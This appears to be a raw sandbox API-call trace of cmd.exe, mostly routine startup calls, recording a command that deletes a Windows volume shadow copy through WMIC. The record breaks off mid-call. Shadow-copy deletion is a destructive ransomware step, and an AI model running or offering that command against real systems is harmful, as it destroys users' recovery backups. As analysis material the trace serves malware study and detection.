[0121.364] _get_osfhandle (_FileHandle=0) returned 0x3 [0121.364] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0121.364] GetEnvironmentStringsW () returned 0x478b90* [0121.364] GetProcessHeap () returned 0x460000 [0121.364] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xa7c) returned 0x479620 [0121.364] FreeEnvironmentStringsW (penv=0x478b90) returned 1 [0121.364] GetProcessHeap () returned 0x460000 [0121.364] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x8) returned 0x478a10 [0121.364] GetEnvironmentStringsW () returned 0x478b90* [0121.364] GetProcessHeap () returned 0x460000 [0121.364] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xa7c) returned 0x47a0b0 [0121.364] FreeEnvironmentStringsW (penv=0x478b90) returned 1 [0121.364] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e708 | out: phkResult=0x28e708*=0x44) returned 0x0 [0121.364] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e700, lpData=0x28e720, lpcbData=0x28e704*=0x1000 | out: lpType=0x28e700*=0x0, lpData=0x28e720*=0x18, lpcbData=0x28e704*=0x1000) returned 0x2 [0121.364] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e700, lpData=0x28e720, lpcbData=0x28e704*=0x1000 | out: lpType=0x28e700*=0x4, lpData=0x28e720*=0x1, lpcbData=0x28e704*=0x4) returned 0x0 [0121.365] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e700, lpData=0x28e720, lpcbData=0x28e704*=0x1000 | out: lpType=0x28e700*=0x0, lpData=0x28e720*=0x1, lpcbData=0x28e704*=0x1000) returned 0x2 [0121.365] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e700, lpData=0x28e720, lpcbData=0x28e704*=0x1000 | out: lpType=0x28e700*=0x4, lpData=0x28e720*=0x0, lpcbData=0x28e704*=0x4) returned 0x0 [0121.365] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e700, lpData=0x28e720, lpcbData=0x28e704*=0x1000 | out: lpType=0x28e700*=0x4, lpData=0x28e720*=0x40, lpcbData=0x28e704*=0x4) returned 0x0 [0121.365] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e700, lpData=0x28e720, lpcbData=0x28e704*=0x1000 | out: lpType=0x28e700*=0x4, lpData=0x28e720*=0x40, lpcbData=0x28e704*=0x4) returned 0x0 [0121.365] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e700, lpData=0x28e720, lpcbData=0x28e704*=0x1000 | out: lpType=0x28e700*=0x0, lpData=0x28e720*=0x40, lpcbData=0x28e704*=0x1000) returned 0x2 [0121.365] RegCloseKey (hKey=0x44) returned 0x0 [0121.365] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e708 | out: phkResult=0x28e708*=0x44) returned 0x0 [0121.365] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e700, lpData=0x28e720, lpcbData=0x28e704*=0x1000 | out: lpType=0x28e700*=0x0, lpData=0x28e720*=0x40, lpcbData=0x28e704*=0x1000) returned 0x2 [0121.365] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e700, lpData=0x28e720, lpcbData=0x28e704*=0x1000 | out: lpType=0x28e700*=0x4, lpData=0x28e720*=0x1, lpcbData=0x28e704*=0x4) returned 0x0 [0121.365] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e700, lpData=0x28e720, lpcbData=0x28e704*=0x1000 | out: lpType=0x28e700*=0x0, lpData=0x28e720*=0x1, lpcbData=0x28e704*=0x1000) returned 0x2 [0121.365] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e700, lpData=0x28e720, lpcbData=0x28e704*=0x1000 | out: lpType=0x28e700*=0x4, lpData=0x28e720*=0x0, lpcbData=0x28e704*=0x4) returned 0x0 [0121.365] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e700, lpData=0x28e720, lpcbData=0x28e704*=0x1000 | out: lpType=0x28e700*=0x4, lpData=0x28e720*=0x9, lpcbData=0x28e704*=0x4) returned 0x0 [0121.365] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e700, lpData=0x28e720, lpcbData=0x28e704*=0x1000 | out: lpType=0x28e700*=0x4, lpData=0x28e720*=0x9, lpcbData=0x28e704*=0x4) returned 0x0 [0121.365] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e700, lpData=0x28e720, lpcbData=0x28e704*=0x1000 | out: lpType=0x28e700*=0x0, lpData=0x28e720*=0x9, lpcbData=0x28e704*=0x1000) returned 0x2 [0121.365] RegCloseKey (hKey=0x44) returned 0x0 [0121.365] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51745d [0121.365] srand (_Seed=0x5f51745d) [0121.365] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete" [0121.365] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete" [0121.365] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a89c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0121.366] GetProcessHeap () returned 0x460000 [0121.366] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x218) returned 0x47ab40 [0121.366] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x47ab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0121.366] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a88f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0121.366] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a88f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0121.366] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a88f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0121.366] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0121.366] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0121.366] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0121.366] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0121.366] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0121.366] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0121.366] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0121.366] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0121.366] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0121.366] GetProcessHeap () returned 0x460000 [0121.366] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x479620 | out: hHeap=0x460000) returned 1 [0121.366] GetEnvironmentStringsW () returned 0x478b90* [0121.366] GetProcessHeap () returned 0x460000 [0121.366] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xa94) returned 0x47ad60 [0121.367] FreeEnvironmentStringsW (penv=0x478b90) returned 1 [0121.367] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a88f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0121.367] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a88f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0121.367] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0121.367] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0121.367] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0121.367] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0121.367] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0121.367] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0121.367] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0121.367] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0121.367] GetProcessHeap () returned 0x460000 [0121.367] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x5c) returned 0x47b800 [0121.367] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f510 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0121.367] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x28f510, lpFilePart=0x28f4f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x28f4f0*="Desktop") returned 0x25 [0121.367] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0121.367] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f220 | out: lpFindFileData=0x28f220*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x47b870 [0121.367] FindClose (in: hFindFile=0x47b870 | out: hFindFile=0x47b870) returned 1 [0121.367] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x28f220 | out: lpFindFileData=0x28f220*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x47b870 [0121.368] FindClose (in: hFindFile=0x47b870 | out: hFindFile=0x47b870) returned 1 [0121.368] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0121.368] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x28f220 | out: lpFindFileData=0x28f220*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x47b870 [0121.368] FindClose (in: hFindFile=0x47b870 | out: hFindFile=0x47b870) returned 1 [0121.368] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0121.368] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0121.368] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0121.368] GetProcessHeap () returned 0x460000 [0121.368] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47ad60 | out: hHeap=0x460000) returned 1 [0121.368] GetEnvironmentStringsW () returned 0x47b870* [0121.368] GetProcessHeap () returned 0x460000 [0121.368] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xae8) returned 0x47c360 [0121.368] FreeEnvironmentStringsW (penv=0x47b870) returned 1 [0121.368] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a89c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0121.368] GetProcessHeap () returned 0x460000 [0121.368] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47b800 | out: hHeap=0x460000) returned 1 [0121.368] GetProcessHeap () returned 0x460000 [0121.368] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x4016) returned 0x47ce50 [0121.369] GetProcessHeap () returned 0x460000 [0121.369] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xe4) returned 0x479680 [0121.369] GetProcessHeap () returned 0x460000 [0121.369] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47ce50 | out: hHeap=0x460000) returned 1 [0121.369] GetConsoleOutputCP () returned 0x1b5 [0121.369] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a89bfe0 | out: lpCPInfo=0x4a89bfe0) returned 1 [0121.369] GetUserDefaultLCID () returned 0x409 [0121.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a897b50, cchData=8 | out: lpLCData=":") returned 2 [0121.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f620, cchData=128 | out: lpLCData="0") returned 2 [0121.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f620, cchData=128 | out: lpLCData="0") returned 2 [0121.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f620, cchData=128 | out: lpLCData="1") returned 2 [0121.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a8aa740, cchData=8 | out: lpLCData="/") returned 2 [0121.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a8aa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0121.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a8aa460, cchData=32 | out: lpLCData="Tue") returned 4 [0121.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a8aa420, cchData=32 | out: lpLCData="Wed") returned 4 [0121.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a8aa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0121.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a8aa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0121.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a8aa360, cchData=32 | out: lpLCData="Sat") returned 4 [0121.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a8aa700, cchData=32 | out: lpLCData="Sun") returned 4 [0121.370] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a897b40, cchData=8 | out: lpLCData=".") returned 2 [0121.370] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a8aa4e0, cchData=8 | out: lpLCData=",") returned 2 [0121.370] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0121.371] GetProcessHeap () returned 0x460000 [0121.371] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x20c) returned 0x4797e0 [0121.371] GetConsoleTitleW (in: lpConsoleTitle=0x4797e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0121.371] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0121.371] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0121.371] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0121.371] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0121.371] GetProcessHeap () returned 0x460000 [0121.371] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x4012) returned 0x47ce50 [0121.371] GetProcessHeap () returned 0x460000 [0121.371] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47ce50 | out: hHeap=0x460000) returned 1 [0121.374] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0121.374] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0121.374] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0121.374] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0121.374] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0121.374] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0121.374] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0121.374] GetProcessHeap () returned 0x460000 [0121.374] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb0) returned 0x479a00 [0121.374] GetProcessHeap () returned 0x460000 [0121.374] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x54) returned 0x479ac0 [0121.376] GetProcessHeap () returned 0x460000 [0121.376] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x9e) returned 0x479b20 [0121.377] GetConsoleTitleW (in: lpConsoleTitle=0x28f530, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0121.377] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0121.377] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0121.377] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f0c0, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f0a0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f0a0*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0121.377] GetProcessHeap () returned 0x460000 [0121.377] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x218) returned 0x479bd0 [0121.377] GetProcessHeap () returned 0x460000 [0121.377] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xe2) returned 0x479df0 [0121.378] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0121.378] GetProcessHeap () returned 0x460000 [0121.378] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x420) returned 0x461320 [0121.378] SetErrorMode (uMode=0x0) returned 0x8001 [0121.378] SetErrorMode (uMode=0x1) returned 0x0 [0121.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x461330, lpFilePart=0x28edc0 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x28edc0*="wbem") returned 0x18 [0121.378] SetErrorMode (uMode=0x8001) returned 0x1 [0121.378] GetProcessHeap () returned 0x460000 [0121.378] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x461320, Size=0x54) returned 0x461320 [0121.378] GetProcessHeap () returned 0x460000 [0121.378] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x461320) returned 0x54 [0121.378] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0121.378] GetProcessHeap () returned 0x460000 [0121.378] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x48) returned 0x479ee0 [0121.378] GetProcessHeap () returned 0x460000 [0121.378] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x7c) returned 0x479f30 [0121.379] GetProcessHeap () returned 0x460000 [0121.379] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x479f30, Size=0x48) returned 0x479f30 [0121.379] GetProcessHeap () returned 0x460000 [0121.379] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x479f30) returned 0x48 [0121.379] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a88f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0121.379] GetProcessHeap () returned 0x460000 [0121.379] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xe8) returned 0x479f90 [0121.382] GetProcessHeap () returned 0x460000 [0121.382] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x479f90, Size=0x7e) returned 0x479f90 [0121.382] GetProcessHeap () returned 0x460000 [0121.382] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x479f90) returned 0x7e [0121.383] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0121.383] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x28eb30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb30) returned 0x47a020 [0121.384] GetProcessHeap () returned 0x460000 [0121.384] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x28) returned 0x4746c0 [0121.384] FindClose (in: hFindFile=0x47a020 | out: hFindFile=0x47a020) returned 1 [0121.384] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0121.384] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0121.384] GetConsoleTitleW (in: lpConsoleTitle=0x28f080, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0121.384] InitializeProcThreadAttributeList (in: lpAttributeList=0x28ee38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28edf8 | out: lpAttributeList=0x28ee38, lpSize=0x28edf8) returned 1 [0121.384] UpdateProcThreadAttribute (in: lpAttributeList=0x28ee38, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ede8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28ee38, lpPreviousValue=0x0) returned 1 [0121.384] GetStartupInfoW (in: lpStartupInfo=0x28ef50 | out: lpStartupInfo=0x28ef50*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0121.384] GetProcessHeap () returned 0x460000 [0121.384] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x20) returned 0x4746f0 [0121.384] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0121.384] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0121.384] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0121.384] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0121.384] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0121.384] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0121.384] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0121.384] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0121.384] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0121.385] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0121.385] GetProcessHeap () returned 0x460000 [0121.385] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4746f0 | out: hHeap=0x460000) returned 1 [0121.385] GetProcessHeap () returned 0x460000 [0121.385] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x12) returned 0x478a30 [0121.385] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0121.386] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x28ee70*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where 